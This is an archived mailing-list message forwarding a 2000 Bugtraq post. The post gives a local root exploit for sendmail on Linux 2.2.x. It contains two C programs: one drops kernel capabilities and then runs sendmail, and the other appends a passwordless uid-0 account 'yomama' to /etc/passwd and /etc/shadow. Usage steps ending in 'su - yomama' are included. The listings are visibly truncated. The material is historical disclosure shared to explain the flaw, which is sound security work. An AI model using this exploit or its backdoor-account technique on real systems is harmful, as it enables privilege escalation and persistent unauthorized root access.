[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

[sm@xxxxxxxxxxxxx: Sendmail local root exploit on linux 2.2.x (fwd)]

Here is an example demonstrating the root exploit that was recently
discovered in sendmail+kernel (<= 2.2.15).  It is not directly related
to linux in india.  But is useful, neverthless, to understand how the
exploit works.  Please don't flame pgm.

--- Begin Message ---

I hope this mail will reach the list owner.

Since many people who use sendmail on linux might not have seen
this message , I suggest that this info may be made available to
the people. [ I don't know whether this is already done ]

At the same time , I don't know the implications of putting it on
the list. I hope the decision must be that of the list-admin.

Please ignore the message if this information is insignificant or

With regards
P G Mohanan, Systems Manager 
Central Computer Centre
KREC Surathkal
Phone: 0824-475984 ext 301

---------- Forwarded message ----------
Date: Thu, 8 Jun 2000 14:21:48 +0200
From: Florian Heinz <sky@xxxxxxxxxxxxx>
To: BUGTRAQ@xxxxxxxxxxxxxxxxx
Subject: Sendmail local root exploit on linux 2.2.x

Hello all,

Attached is a file with 2 sources, ex.c and add.c

compile these 2 and create a file "mail":

From: yomama@xxxxxxxxxx
To: localuser@xxxxxxxxxxxxxxx
Subject: foo

then create a .forward with:

then just do: ./ex < mail

this should add a user yomama with uid/gid = 0 and without a password
a simple su - yomama should give you root.

This exploit was written by me in a hurry, I hope there are no mistakes


Florian Heinz
-- snip -- ex.c --

#include <linux/capability.h>

int main (void) {
   cap_user_header_t header;
   cap_user_data_t data;

   header = malloc(8);
   data = malloc(12);

   header->pid = 0;
   header->version = _LINUX_CAPABILITY_VERSION;

   data->inheritable = data->effective = data->permitted = 0;
   capset(header, data);

   execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL);

-- snap -- ex.c --

-- snip -- add.c --

#include <fcntl.h>

int main (void) {
   int fd;
   char string[40];

   fd = open("/etc/passwd", O_APPEND|O_WRONLY);
   strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
   write(fd, string, strlen(string));
   fd = open("/etc/shadow", O_APPEND|O_WRONLY);
   strcpy(string, "yomama::11029:0:99999:7:::");
   write(fd, string, strlen(string));


-- snap -- add.c --

--- End Message ---